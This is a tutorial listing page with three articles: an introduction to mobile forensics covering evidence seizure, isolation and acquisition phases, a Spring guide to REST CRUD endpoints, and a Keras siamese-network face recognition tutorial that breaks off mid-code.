Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

6719 Articles
article-image-introduction-mobile-forensics
Packt
10 Jul 2014
18 min read
Save for later

Introduction to Mobile Forensics

Packt
10 Jul 2014
18 min read
(For more resources related to this topic, see here.) In 2013, there were almost as many mobile cellular subscriptions as there were people on earth, says International Telecommunication Union (ITU). The following figure shows the global mobile cellular subscriptions from 2005 to 2013. Mobile cellular subscriptions are moving at lightning speed and passed a whopping 7 billion early in 2014. Portio Research Ltd. predicts that mobile subscribers will reach 7.5 billion by the end of 2014 and 8.5 billion by the end of 2016. Mobile cellular subscription growth from 2005 to 2013 Smartphones of today, such as the Apple iPhone, Samsung Galaxy series, and BlackBerry phones, are compact forms of computers with high performance, huge storage, and enhanced functionalities. Mobile phones are the most personal electronic device a user accesses. They are used to perform simple communication tasks, such as calling and texting, while still providing support for Internet browsing, e-mail, taking photos and videos, creating and storing documents, identifying locations with GPS services, and managing business tasks. As new features and applications are incorporated into mobile phones, the amount of information stored on the devices is continuously growing. Mobiles phones become portable data carriers, and they keep track of all your moves. With the increasing prevalence of mobile phones in peoples' daily lives and in crime, data acquired from phones become an invaluable source of evidence for investigations relating to criminal, civil, and even high-profile cases. It is rare to conduct a digital forensic investigation that does not include a phone. Mobile device call logs and GPS data were used to help solve the attempted bombing in Times Square, New York, in 2010. The details of the case can be found at http://www.forensicon.com/forensics-blotter/cell-phone-email-forensics-investigation-cracks-nyc-times-square-car-bombing-case/. The science behind recovering digital evidence from mobile phones is called mobile forensics. Digital evidence is defined as information and data that is stored on, received, or transmitted by an electronic device that is used for investigations. Digital evidence encompasses any and all digital data that can be used as evidence in a case. Mobile forensics Digital forensics is a branch of forensic science, focusing on the recovery and investigation of raw data residing in electronic or digital devices. Mobile forensics is a branch of digital forensics related to the recovery of digital evidence from mobile devices. Forensically sound is a term used extensively in the digital forensics community to qualify and justify the use of particular forensic technology or methodology. The main principle for a sound forensic examination of digital evidence is that the original evidence must not be modified. This is extremely difficult with mobile devices. Some forensic tools require a communication vector with the mobile device, thus standard write protection will not work during forensic acquisition. Other forensic acquisition methods may involve removing a chip or installing a bootloader on the mobile device prior to extracting data for forensic examination. In cases where the examination or data acquisition is not possible without changing the configuration of the device, the procedure and the changes must be tested, validated, and documented. Following proper methodology and guidelines is crucial in examining mobile devices as it yields the most valuable data. As with any evidence gathering, not following the proper procedure during the examination can result in loss or damage of evidence or render it inadmissible in court. The mobile forensics process is broken into three main categories: seizure, acquisition, and examination/analysis. Forensic examiners face some challenges while seizing the mobile device as a source of evidence. At the crime scene, if the mobile device is found switched off, the examiner should place the device in a faraday bag to prevent changes should the device automatically power on. Faraday bags are specifically designed to isolate the phone from the network. If the phone is found switched on, switching it off has a lot of concerns attached to it. If the phone is locked by a PIN or password or encrypted, the examiner will be required to bypass the lock or determine the PIN to access the device. Mobile phones are networked devices and can send and receive data through different sources, such as telecommunication systems, Wi-Fi access points, and Bluetooth. So if the phone is in a running state, a criminal can securely erase the data stored on the phone by executing a remote wipe command. When a phone is switched on, it should be placed in a faraday bag. If possible, prior to placing the mobile device in the faraday bag, disconnect it from the network to protect the evidence by enabling the flight mode and disabling all network connections (Wi-Fi, GPS, Hotspots, and so on). This will also preserve the battery, which will drain while in a faraday bag and protect against leaks in the faraday bag. Once the mobile device is seized properly, the examiner may need several forensic tools to acquire and analyze the data stored on the phone. Mobile device forensic acquisition can be performed using multiple methods, which are defined later. Each of these methods affects the amount of analysis required. Should one method fail, another must be attempted. Multiple attempts and tools may be necessary in order to acquire the most data from the mobile device. Mobile phones are dynamic systems that present a lot of challenges to the examiner in extracting and analyzing digital evidence. The rapid increase in the number of different kinds of mobile phones from different manufacturers makes it difficult to develop a single process or tool to examine all types of devices. Mobile phones are continuously evolving as existing technologies progress and new technologies are introduced. Furthermore, each mobile is designed with a variety of embedded operating systems. Hence, special knowledge and skills are required from forensic experts to acquire and analyze the devices. Mobile forensic challenges One of the biggest forensic challenges when it comes to the mobile platform is the fact that data can be accessed, stored, and synchronized across multiple devices. As the data is volatile and can be quickly transformed or deleted remotely, more effort is required for the preservation of this data. Mobile forensics is different from computer forensics and presents unique challenges to forensic examiners. Law enforcement and forensic examiners often struggle to obtain digital evidence from mobile devices. The following are some of the reasons: Hardware differences: The market is flooded with different models of mobile phones from different manufacturers. Forensic examiners may come across different types of mobile models, which differ in size, hardware, features, and operating system. Also, with a short product development cycle, new models emerge very frequently. As the mobile landscape is changing each passing day, it is critical for the examiner to adapt to all the challenges and remain updated on mobile device forensic techniques. Mobile operating systems: Unlike personal computers where Windows has dominated the market for years, mobile devices widely use more operating systems, including Apple's iOS, Google's Android, RIM's BlackBerry OS, Microsoft's Windows Mobile, HP's webOS, Nokia's Symbian OS, and many others. Mobile platform security features: Modern mobile platforms contain built-in security features to protect user data and privacy. These features act as a hurdle during the forensic acquisition and examination. For example, modern mobile devices come with default encryption mechanisms from the hardware layer to the software layer. The examiner might need to break through these encryption mechanisms to extract data from the devices. Lack of resources: As mentioned earlier, with the growing number of mobile phones, the tools required by a forensic examiner would also increase. Forensic acquisition accessories, such as USB cables, batteries, and chargers for different mobile phones, have to be maintained in order to acquire those devices. Generic state of the device: Even if a device appears to be in an off state, background processes may still run. For example, in most mobiles, the alarm clock still works even when the phone is switched off. A sudden transition from one state to another may result in the loss or modification of data. Anti-forensic techniques: Anti-forensic techniques, such as data hiding, data obfuscation, data forgery, and secure wiping, make investigations on digital media more difficult. Dynamic nature of evidence: Digital evidence may be easily altered either intentionally or unintentionally. For example, browsing an application on the phone might alter the data stored by that application on the device. Accidental reset: Mobile phones provide features to reset everything. Resetting the device accidentally while examining may result in the loss of data. Device alteration: The possible ways to alter devices may range from moving application data, renaming files, and modifying the manufacturer's operating system. In this case, the expertise of the suspect should be taken into account. Passcode recovery: If the device is protected with a passcode, the forensic examiner needs to gain access to the device without damaging the data on the device. Communication shielding: Mobile devices communicate over cellular networks, Wi-Fi networks, Bluetooth, and Infrared. As device communication might alter the device data, the possibility of further communication should be eliminated after seizing the device. Lack of availability of tools: There is a wide range of mobile devices. A single tool may not support all the devices or perform all the necessary functions, so a combination of tools needs to be used. Choosing the right tool for a particular phone might be difficult. Malicious programs: The device might contain malicious software or malware, such as a virus or a Trojan. Such malicious programs may attempt to spread over other devices over either a wired interface or a wireless one. Legal issues: Mobile devices might be involved in crimes, which can cross geographical boundaries. In order to tackle these multijurisdictional issues, the forensic examiner should be aware of the nature of the crime and the regional laws. Mobile phone evidence extraction process Evidence extraction and forensic examination of each mobile device may differ. However, following a consistent examination process will assist the forensic examiner to ensure that the evidence extracted from each phone is well documented and that the results are repeatable and defendable. There is no well-established standard process for mobile forensics. However, the following figure provides an overview of process considerations for extraction of evidence from mobile devices. All methods used when extracting data from mobile devices should be tested, validated, and well documented. A great resource for handling and processing mobile devices can be found at http://digital-forensics.sans.org/media/mobile-device-forensic-process-v3.pdf. Mobile phone evidence extraction process The evidence intake phase The evidence intake phase is the starting phase and entails request forms and paperwork to document ownership information and the type of incident the mobile device was involved in, and outlines the type of data or information the requester is seeking. Developing specific objectives for each examination is the critical part of this phase. It serves to clarify the examiner's goals. The identification phase The forensic examiner should identify the following details for every examination of a mobile device: The legal authority The goals of the examination The make, model, and identifying information for the device Removable and external data storage Other sources of potential evidence We will discuss each of them in the following sections. The legal authority It is important for the forensic examiner to determine and document what legal authority exists for the acquisition and examination of the device as well as any limitations placed on the media prior to the examination of the device. The goals of the examination The examiner will identify how in-depth the examination needs to be based upon the data requested. The goal of the examination makes a significant difference in selecting the tools and techniques to examine the phone and increases the efficiency of the examination process. The make, model, and identifying information for the device As part of the examination, identifying the make and model of the phone assists in determining what tools would work with the phone. Removable and external data storage Many mobile phones provide an option to extend the memory with removable storage devices, such as the Trans Flash Micro SD memory expansion card. In cases when such a card is found in a mobile phone that is submitted for examination, the card should be removed and processed using traditional digital forensic techniques. It is wise to also acquire the card while in the mobile device to ensure data stored on both the handset memory and card are linked for easier analysis. Other sources of potential evidence Mobile phones act as good sources of fingerprint and other biological evidence. Such evidence should be collected prior to the examination of the mobile phone to avoid contamination issues unless the collection method will damage the device. Examiners should wear gloves when handling the evidence. The preparation phase Once the mobile phone model is identified, the preparation phase involves research regarding the particular mobile phone to be examined and the appropriate methods and tools to be used for acquisition and examination. The isolation phase Mobile phones are by design intended to communicate via cellular phone networks, Bluetooth, Infrared, and wireless (Wi-Fi) network capabilities. When the phone is connected to a network, new data is added to the phone through incoming calls, messages, and application data, which modifies the evidence on the phone. Complete destruction of data is also possible through remote access or remote wiping commands. For this reason, isolation of the device from communication sources is important prior to the acquisition and examination of the device. Isolation of the phone can be accomplished through the use of faraday bags, which block the radio signals to or from the phone. Past research has found inconsistencies in total communication protection with faraday bags. Therefore, network isolation is advisable. This can be done by placing the phone in radio frequency shielding cloth and then placing the phone into airplane or flight mode. The processing phase Once the phone has been isolated from the communication networks, the actual processing of the mobile phone begins. The phone should be acquired using a tested method that is repeatable and is as forensically sound as possible. Physical acquisition is the preferred method as it extracts the raw memory data and the device is commonly powered off during the acquisition process. On most devices, the least amount of changes occur to the device during physical acquisition. If physical acquisition is not possible or fails, an attempt should be made to acquire the file system of the mobile device. A logical acquisition should always be obtained as it may contain only the parsed data and provide pointers to examine the raw memory image. The verification phase After processing the phone, the examiner needs to verify the accuracy of the data extracted from the phone to ensure that data is not modified. The verification of the extracted data can be accomplished in several ways. Comparing extracted data to the handset data Check if the data extracted from the device matches the data displayed by the device. The data extracted can be compared to the device itself or a logical report, whichever is preferred. Remember, handling the original device may make changes to the only evidence—the device itself. Using multiple tools and comparing the results To ensure accuracy, use multiple tools to extract the data and compare results. Using hash values All image files should be hashed after acquisition to ensure data remains unchanged. If file system extraction is supported, the examiner extracts the file system and then computes hashes for the extracted files. Later, any individually extracted file hash is calculated and checked against the original value to verify the integrity of it. Any discrepancy in a hash value must be explainable (for example, if the device was powered on and then acquired again, thus the hash values are different). The document and reporting phase The forensic examiner is required to document throughout the examination process in the form of contemporaneous notes relating to what was done during the acquisition and examination. Once the examiner completes the investigation, the results must go through some form of peer-review to ensure the data is checked and the investigation is complete. The examiner's notes and documentation may include information such as the following: Examination start date and time The physical condition of the phone Photos of the phone and individual components Phone status when received—turned on or off Phone make and model Tools used for the acquisition Tools used for the examination Data found during the examination Notes from peer-review The presentation phase Throughout the investigation, it is important to make sure that the information extracted and documented from a mobile device can be clearly presented to any other examiner or to a court. Creating a forensic report of data extracted from the mobile device during acquisition and analysis is important. This may include data in both paper and electronic formats. Your findings must be documented and presented in a manner that the evidence speaks for itself when in court. The findings should be clear, concise, and repeatable. Timeline and link analysis, features offered by many commercial mobile forensics tools, will aid in reporting and explaining findings across multiple mobile devices. These tools allow the examiner to tie together the methods behind the communication of multiple devices. The archiving phase Preserving the data extracted from the mobile phone is an important part of the overall process. It is also important that the data is retained in a useable format for the ongoing court process, for future reference, should the current evidence file become corrupt, and for record keeping requirements. Court cases may continue for many years before the final judgment is arrived at, and most jurisdictions require that data be retained for long periods of time for the purposes of appeals. As the field and methods advance, new methods for pulling data out of a raw, physical image may surface, and then the examiner can revisit the data by pulling a copy from the archives. Practical mobile forensic approaches Similar to any forensic investigation, there are several approaches that can be used for the acquisition and examination/analysis of data from mobile phones. The type of mobile device, the operating system, and the security setting generally dictate the procedure to be followed in a forensic process. Every investigation is distinct with its own circumstances, so it is not possible to design a single definitive procedural approach for all the cases. The following details outline the general approaches followed in extracting data from mobile devices. Mobile operating systems overview One of the major factors in the data acquisition and examination/analysis of a mobile phone is the operating system. Starting from low-end mobile phones to smartphones, mobile operating systems have come a long way with a lot of features. Mobile operating systems directly affect how the examiner can access the mobile device. For example, Android OS gives terminal-level access whereas iOS does not give such an option. A comprehensive understanding of the mobile platform helps the forensic examiner make sound forensic decisions and conduct a conclusive investigation. While there is a large range of smart mobile devices, four main operating systems dominate the market, namely, Google Android, Apple iOS, RIM BlackBerry OS, and Windows Phone. More information can be found at http://www.idc.com/getdoc.jsp?containerId=prUS23946013. Android Android is a Linux-based operating system, and it's a Google open source platform for mobile phones. Android is the world's most widely used smartphone operating system. Sources show that Apple's iOS is a close second (http://www.forbes.com/sites/tonybradley/2013/11/15/android-dominates-market-share-but-apple-makes-all-the-money/). Android has been developed by Google as an open and free option for hardware manufacturers and phone carriers. This makes Android the software of choice for companies who require a low-cost, customizable, lightweight operating system for their smart devices without developing a new OS from scratch. Android's open nature has further encouraged the developers to build a large number of applications and upload them onto Android Market. Later, end users can download the application from Android Market, which makes Android a powerful operating system. iOS iOS, formerly known as the iPhone operating system, is a mobile operating system developed and distributed solely by Apple Inc. iOS is evolving into a universal operating system for all Apple mobile devices, such as iPad, iPod touch, and iPhone. iOS is derived from OS X, with which it shares the Darwin foundation, and is therefore a Unix-like operating system. iOS manages the device hardware and provides the technologies required to implement native applications. iOS also ships with various system applications, such as Mail and Safari, which provide standard system services to the user. iOS native applications are distributed through AppStore, which is closely monitored by Apple. Windows phone Windows phone is a proprietary mobile operating system developed by Microsoft for smartphones and pocket PCs. It is the successor to Windows mobile and primarily aimed at the consumer market rather than the enterprise market. The Windows Phone OS is similar to the Windows desktop OS, but it is optimized for devices with a small amount of storage. BlackBerry OS BlackBerry OS is a proprietary mobile operating system developed by BlackBerry Ltd., known as Research in Motion (RIM), exclusively for its BlackBerry line of smartphones and mobile devices. BlackBerry mobiles are widely used in corporate companies and offer native support for corporate mail via MIDP, which enables wireless sync with Microsoft Exchange, e-mail, contacts, calendar, and so on, while used along with the BlackBerry Enterprise server. These devices are known for their security.
Read more
  • 0
  • 0
  • 14882

article-image-crud-operations-rest
Packt
16 Sep 2015
11 min read
Save for later

CRUD Operations in REST

Packt
16 Sep 2015
11 min read
In this article by Ludovic Dewailly, the author of Building a RESTful Web Service with Spring, we will learn how requests to retrieve data from a RESTful endpoint, created to access the rooms in a sample property management system, are typically mapped to the HTTP GET method in RESTful web services. We will expand on this by implementing some of the endpoints to support all the CRUD (Create, Read, Update, Delete) operations. In this article, we will cover the following topics: Mapping the CRUD operations to the HTTP methods Creating resources Updating resources Deleting resources Testing the RESTful operations Emulating the PUT and DELETE methods (For more resources related to this topic, see here.) Mapping the CRUD operations[km1]  to HTTP [km2] [km3] methods The HTTP 1.1 specification defines the following methods: OPTIONS: This method represents a request for information about the communication options available for the requested URI. This is, typically, not directly leveraged with REST. However, this method can be used as a part of the underlying communication. For example, this method may be used when consuming web services from a web page (as a part of the C[km4] ross-origin resource sharing mechanism). GET: This method retrieves the information identified by the request URI. In the context of the RESTful web services, this method is used to retrieve resources. This is the method used for read operations (the R in CRUD). HEAD: The HEAD requests are semantically identical to the GET requests except the body of the response is not transmitted. This method is useful for obtaining meta-information about resources. Similar to the OPTIONS method, this method is not typically used directly in REST web services. POST: This method is used to instruct the server to accept the entity enclosed in the request as a new resource. The create operations are typically mapped to this HTTP method. PUT: This method requests the server to store the enclosed entity under the request URI. To support the updating of REST resources, this method can be leveraged. As per the HTTP specification, the server can create the resource if the entity does not exist. It is up to the web service designer to decide whether this behavior should be implemented or resource creation should only be handled by POST requests. DELETE: The last operation not yet mapped is for the deletion of resources. The HTTP specification defines a DELETE method that is semantically aligned with the deletion of RESTful resources. TRACE: This method is used to perform actions on web servers. These actions are often aimed to aid development and the testing of HTTP applications. The TRACE requests aren't usually mapped to any particular RESTful operations. CONNECT: This HTTP method is defined to support HTTP tunneling through a proxy server. Since it deals with transport layer concerns, this method has no natural semantic mapping to the RESTful operations. The RESTful architecture does not mandate the use of HTTP as a communication protocol. Furthermore, even if HTTP is selected as the underlying transport, no provisions are made regarding the mapping of the RESTful operations to the HTTP method. Developers could feasibly support all operations through POST requests. This being said, the following CRUD to HTTP method mapping is commonly used in REST web services: Operation HTTP method Create POST Read GET Update PUT Delete DELETE Our sample web service will use these HTTP methods to support CRUD operations. The rest of this article will illustrate how to build such operations. Creating r[km5] esources The inventory component of our sample property management system deals with rooms. If we have already built an endpoint to access the rooms. Let's take a look at how to define an endpoint to create new resources: @RestController @RequestMapping("/rooms") public class RoomsResource { @RequestMapping(method = RequestMethod.POST) public ApiResponse addRoom(@RequestBody RoomDTO room) { Room newRoom = createRoom(room); return new ApiResponse(Status.OK, new RoomDTO(newRoom)); } } We've added a new method to our RoomsResource class to handle the creation of new rooms. @RequestMapping is used to map requests to the Java method. Here we map the POST requests to addRoom(). Not specifying a value (that is, path) in @RequestMapping is equivalent to using "/". We pass the new room as @RequestBody. This annotation instructs Spring to map the body of the incoming web request to the method parameter. Jackson is used here to convert the JSON request body to a Java object. With this new method, the POSTing requests to http://localhost:8080/rooms with the following JSON body will result in the creation of a new room: { name: "Cool Room", description: "A room that is very cool indeed", room_category_id: 1 } Our new method will return the newly created room: { "status":"OK", "data":{ "id":2, "name":"Cool Room", "room_category_id":1, "description":"A room that is very cool indeed" } } We can decide to return only the ID of the new resource in response to the resource creation. However, since we may sanitize or otherwise manipulate the data that was sent over, it is a good practice to return the full resource. Quickly testing endpoints[km6]  For the purpose of quickly testing our newly created endpoint, let's look at testing the new rooms created using Postman. Postman (https://www.getpostman.com) is a Google Chrome plugin extension that provides tools to build and test web APIs. This following screenshot illustrates how Postman can be used to test this endpoint: In Postman, we specify the URL to send the POST request to http://localhost:8080/rooms, with the "[km7] application/json" content type header and the body of the request. Sending this requesting will result in a new room being created and returned as shown in the following: We have successfully added a room to our inventory service using Postman. It is equally easy to create incomplete requests to ensure our endpoint performs any necessary sanity checks before persisting data into the database. JSON versus[km8]  form data Posting forms is the traditional way of creating new entities on the web and could easily be used to create new RESTful resources. We can change our method to the following: @RequestMapping(method = RequestMethod.POST, consumes = MediaType.APPLICATION_FORM_URLENCODED_VALUE) public ApiResponse addRoom(String name, String description, long roomCategoryId) { Room room = createRoom(name, description, roomCategoryId); return new ApiResponse(Status.OK, new RoomDTO(room)); } The main difference with the previous method is that we tell Spring to map form requests (that is, with application/x-www-form-urlencoded the content type) instead of JSON requests. In addition, rather than expecting an object as a parameter, we receive each field individually. By default, Spring will use the Java method attribute names to map incoming form inputs. Developers can change this behavior by annotating attribute with @RequestParam("…") to specify the input name. In situations where the main web service consumer is a web application, using form requests may be more applicable. In most cases, however, the former approach is more in line with RESTful principles and should be favored. Besides, when complex resources are handled, form requests will prove cumbersome to use. From a developer standpoint, it is easier to delegate object mapping to a third-party library such as Jackson. Now that we have created a new resource, let's see how we can update it. Updating r[km9] esources Choosing URI formats is an important part of designing RESTful APIs. As seen previously, rooms are accessed using the /rooms/{roomId} path and created under /rooms. You may recall that as per the HTTP specification, PUT requests can result in creation of entities, if they do not exist. The decision to create new resources on update requests is up to the service designer. It does, however, affect the choice of path to be used for such requests. Semantically, PUT requests update entities stored under the supplied request URI. This means the update requests should use the same URI as the GET requests: /rooms/{roomId}. However, this approach hinders the ability to support resource creation on update since no room identifier will be available. The alternative path we can use is /rooms with the room identifier passed in the body of the request. With this approach, the PUT requests can be treated as POST requests when the resource does not contain an identifier. Given the first approach is semantically more accurate, we will choose not to support resource create on update, and we will use the following path for the PUT requests: /rooms/{roomId} Update endpoint[km10]  The following method provides the necessary endpoint to modify the rooms: @RequestMapping(value = "/{roomId}", method = RequestMethod.PUT) public ApiResponse updateRoom(@PathVariable long roomId, @RequestBody RoomDTO updatedRoom) { try { Room room = updateRoom(updatedRoom); return new ApiResponse(Status.OK, new RoomDTO(room)); } catch (RecordNotFoundException e) { return new ApiResponse(Status.ERROR, null, new ApiError(999, "No room with ID " + roomId)); } } As discussed in the beginning of this article, we map update requests to the HTTP PUT verb. Annotating this method with @RequestMapping(value = "/{roomId}", method = RequestMethod.PUT) instructs Spring to direct the PUT requests here. The room identifier is part of the path and mapped to the first method parameter. In fashion similar to the resource creation requests, we map the body to our second parameter with the use of @RequestBody. Testing update requests[km11]  With Postman, we can quickly create a test case to update the room we created. To do so, we send a PUT request with the following body: { id: 2, name: "Cool Room", description: "A room that is really very cool indeed", room_category_id: 1 } The resulting response will be the updated room, as shown here: { "status": "OK", "data": { "id": 2, "name": "Cool Room", "room_category_id": 1, "description": "A room that is really very cool indeed." } } Should we attempt to update a nonexistent room, the server will generate the following response: { "status": "ERROR", "error": { "error_code": 999, "description": "No room with ID 3" } } Since we do not support resource creation on update, the server returns an error indicating that the resource cannot be found. Deleting resources[km12]  It will come as no surprise that we will use the DELETE verb to delete REST resources. Similarly, the reader will have already figured out that the path to delete requests will be /rooms/{roomId}. The Java method that deals with room deletion is as follows: @RequestMapping(value = "/{roomId}", method = RequestMethod.DELETE) public ApiResponse deleteRoom(@PathVariable long roomId) { try { Room room = inventoryService.getRoom(roomId); inventoryService.deleteRoom(room.getId()); return new ApiResponse(Status.OK, null); } catch (RecordNotFoundException e) { return new ApiResponse(Status.ERROR, null, new ApiError( 999, "No room with ID " + roomId)); } } By declaring the request mapping method to be RequestMethod.DELETE, Spring will make this method handle the DELETE requests. Since the resource is deleted, returning it in the response would not make a lot of sense. Service designers may choose to return a boolean flag to indicate the resource was successfully deleted. In our case, we leverage the status element of our response to carry this information back to the consumer. The response to deleting a room will be as follows: { "status": "OK" } With this operation, we have now a full-fledged CRUD API for our Inventory Service. Before we conclude this article, let's discuss how REST developers can deal with situations where not all HTTP verbs can be utilized. HTTP method override In certain situations (for example, when the service or its consumers are behind an overzealous corporate firewall, or if the main consumer is a web page), only the GET and POST HTTP methods might be available. In such cases, it is possible to emulate the missing verbs by passing a customer header in the requests. For example, resource updates can be handle using POST requests by setting a customer header (for example, X-HTTP-Method-Override) to PUT to indicate that we are emulating a PUT request via a POST request. The following method will handle this scenario: @RequestMapping(value = "/{roomId}", method = RequestMethod.POST, headers = {"X-HTTP-Method-Override=PUT"}) public ApiResponse updateRoomAsPost(@PathVariable("roomId") long id, @RequestBody RoomDTO updatedRoom) { return updateRoom(id, updatedRoom); } By setting the headers attribute on the mapping annotation, Spring request routing will intercept the POST requests with our custom header and invoke this method. Normal POST requests will still map to the Java method we had put together to create new rooms. Summary In this article, we've performed the implementation of our sample RESTful web service by adding all the CRUD operations necessary to manage the room resources. We've discussed how to organize URIs to best embody the REST principles and looked at how to quickly test endpoints using Postman. Now that we have a fully working component of our system, we can take some time to discuss performance. Resources for Article: Further resources on this subject: Introduction to Spring Web Application in No Time[article] Aggregators, File exchange Over FTP/FTPS, Social Integration, and Enterprise Messaging[article] Time Travelling with Spring[article]
Read more
  • 0
  • 0
  • 14874

article-image-face-recognition-using-siamese-networks-tutorial
Prasad Ramesh
25 Feb 2019
11 min read
Save for later

Face recognition using siamese networks [Tutorial]

Prasad Ramesh
25 Feb 2019
11 min read
A siamese network is a special type of neural network and it is one of the simplest and most popularly used one-shot learning algorithms. One-shot learning is a technique where we learn from only one training example per class. So, a siamese network is predominantly used in applications where we don't have many data points in each class. For instance, let's say we want to build a face recognition model for our organization and about 500 people are working in our organization. If we want to build our face recognition model using a Convolutional Neural Network (CNN) from scratch, then we need many images of all of these 500 people for training the network and attaining good accuracy. But apparently, we will not have many images for all of these 500 people and so it is not feasible to build a model using a CNN or any deep learning algorithm unless we have sufficient data points. So, in these kinds of scenarios, we can resort to a sophisticated one-shot learning algorithm such as a siamese network, which can learn from fewer data points. Siamese networks basically consist of two symmetrical neural networks both sharing the same weights and architecture and both joined together at the end using some energy function, E. The objective of our siamese network is to learn whether two input values are similar or dissimilar. We will understand the siamese network by building a face recognition model. The objective of our network is to understand whether two faces are similar or dissimilar. We use the AT&T Database of Faces, which can be downloaded from the Cambridge University Computer Laboratory website. This article is an excerpt from a book written by Sudharsan Ravichandiran titled Hands-On Meta-Learning with Python. In this book, you will learn how to build relation networks and matching networks from scratch. Once you have downloaded and extracted the archive, you can see the folders s1, s2, up to s40, as shown here:   Each of these folders has 10 different images of a single person taken from various angles. For instance, let's open folder s1. As you can see, there are 10 different images of a single person:   We open and check folder s13: Siamese networks require input values as a pair along with the label, so we have to create our data in such a way. So, we will take two images randomly from the same folder and mark them as a genuine pair and we will take single images from two different folders and mark them as an imposite pair. A sample is shown in the following screenshot; as you can see, a genuine pair has images of the same person and the imposite pair has images of different people: Once we have our data as pairs along with their labels, we train our siamese network. From the image pair, we feed one image to network A and another image to network B. The role of these two networks is only to extract the feature vectors. So, we use two convolution layers with rectified linear unit (ReLU) activations for extracting the features. Once we have learned the features, we feed the resultant feature vector from both of the networks to the energy function, which measures the similarity; we use Euclidean distance as our energy function. So, we train our network by feeding the image pair to learn the semantic similarity between them. Now, we will see this step by step. For better understanding, you can check the complete code, which is available as a Jupyter Notebook with an explanation from GitHub. First, we will import the required libraries: import re import numpy as np from PIL import Image from sklearn.model_selection import train_test_split from keras import backend as K from keras.layers import Activation from keras.layers import Input, Lambda, Dense, Dropout, Convolution2D, MaxPooling2D, Flatten from keras.models import Sequential, Model from keras.optimizers import RMSprop Now, we define a function for reading our input image. The read_image function takes as input an image and returns a NumPy array: def read_image(filename, byteorder='>'): #first we read the image, as a raw file to the buffer with open(filename, 'rb') as f: buffer = f.read() #using regex, we extract the header, width, height and maxval of the image header, width, height, maxval = re.search( b"(^P5\s(?:\s*#.*[\r\n])*" b"(\d+)\s(?:\s*#.*[\r\n])*" b"(\d+)\s(?:\s*#.*[\r\n])*" b"(\d+)\s(?:\s*#.*[\r\n]\s)*)", buffer).groups() #then we convert the image to numpy array using np.frombuffer which interprets buffer as one dimensional array return np.frombuffer(buffer, dtype='u1' if int(maxval) < 256 else byteorder+'u2', count=int(width)*int(height), offset=len(header) ).reshape((int(height), int(width))) For an example, let's open one image: Image.open("data/orl_faces/s1/1.pgm") When we feed this image to our read_image function, it will return as a NumPy array: img = read_image('data/orl_faces/s1/1.pgm') img.shape (112, 92) Now, we define another function, get_data, for generating our data. As we know, for the siamese network, data should be in the form of pairs (genuine and imposite) with a binary label. First, we read the (img1, img2) images from the same directory and store them in the x_genuine_pair array and assign y_genuine to 1. Next, we read the (img1, img2) images from the different directory and store them in the x_imposite pair and assign y_imposite to 0. Finally, we concatenate both x_genuine_pair and x_imposite to X and y_genuine and y_imposite to Y: size = 2 total_sample_size = 10000 def get_data(size, total_sample_size): #read the image image = read_image('data/orl_faces/s' + str(1) + '/' + str(1) + '.pgm', 'rw+') #reduce the size image = image[::size, ::size] #get the new size dim1 = image.shape[0] dim2 = image.shape[1] count = 0 #initialize the numpy array with the shape of [total_sample, no_of_pairs, dim1, dim2] x_geuine_pair = np.zeros([total_sample_size, 2, 1, dim1, dim2]) # 2 is for pairs y_genuine = np.zeros([total_sample_size, 1]) for i in range(40): for j in range(int(total_sample_size/40)): ind1 = 0 ind2 = 0 #read images from same directory (genuine pair) while ind1 == ind2: ind1 = np.random.randint(10) ind2 = np.random.randint(10) # read the two images img1 = read_image('data/orl_faces/s' + str(i+1) + '/' + str(ind1 + 1) + '.pgm', 'rw+') img2 = read_image('data/orl_faces/s' + str(i+1) + '/' + str(ind2 + 1) + '.pgm', 'rw+') #reduce the size img1 = img1[::size, ::size] img2 = img2[::size, ::size] #store the images to the initialized numpy array x_geuine_pair[count, 0, 0, :, :] = img1 x_geuine_pair[count, 1, 0, :, :] = img2 #as we are drawing images from the same directory we assign label as 1. (genuine pair) y_genuine[count] = 1 count += 1 count = 0 x_imposite_pair = np.zeros([total_sample_size, 2, 1, dim1, dim2]) y_imposite = np.zeros([total_sample_size, 1]) for i in range(int(total_sample_size/10)): for j in range(10): #read images from different directory (imposite pair) while True: ind1 = np.random.randint(40) ind2 = np.random.randint(40) if ind1 != ind2: break img1 = read_image('data/orl_faces/s' + str(ind1+1) + '/' + str(j + 1) + '.pgm', 'rw+') img2 = read_image('data/orl_faces/s' + str(ind2+1) + '/' + str(j + 1) + '.pgm', 'rw+') img1 = img1[::size, ::size] img2 = img2[::size, ::size] x_imposite_pair[count, 0, 0, :, :] = img1 x_imposite_pair[count, 1, 0, :, :] = img2 #as we are drawing images from the different directory we assign label as 0. (imposite pair) y_imposite[count] = 0 count += 1 #now, concatenate, genuine pairs and imposite pair to get the whole data X = np.concatenate([x_geuine_pair, x_imposite_pair], axis=0)/255 Y = np.concatenate([y_genuine, y_imposite], axis=0) return X, Y Now, we generate our data and check our data size. As you can see, we have 20,000 data points and, out of these, 10,000 are genuine pairs and 10,000 are imposite pairs: X, Y = get_data(size, total_sample_size) X.shape (20000, 2, 1, 56, 46) Y.shape (20000, 1) Next, we split our data for training and testing with 75% training and 25% testing proportions: x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=.25) Now that we have successfully generated our data, we build our siamese network. First, we define the base network, which is basically a convolutional network used for feature extraction. We build two convolutional layers with ReLU activations and max pooling followed by a flat layer: def build_base_network(input_shape): seq = Sequential() nb_filter = [6, 12] kernel_size = 3 #convolutional layer 1 seq.add(Convolution2D(nb_filter[0], kernel_size, kernel_size, input_shape=input_shape, border_mode='valid', dim_ordering='th')) seq.add(Activation('relu')) seq.add(MaxPooling2D(pool_size=(2, 2))) seq.add(Dropout(.25)) #convolutional layer 2 seq.add(Convolution2D(nb_filter[1], kernel_size, kernel_size, border_mode='valid', dim_ordering='th')) seq.add(Activation('relu')) seq.add(MaxPooling2D(pool_size=(2, 2), dim_ordering='th')) seq.add(Dropout(.25)) #flatten seq.add(Flatten()) seq.add(Dense(128, activation='relu')) seq.add(Dropout(0.1)) seq.add(Dense(50, activation='relu')) return seq Next, we feed the image pair to the base network, which will return the embeddings, that is, feature vectors: input_dim = x_train.shape[2:] img_a = Input(shape=input_dim) img_b = 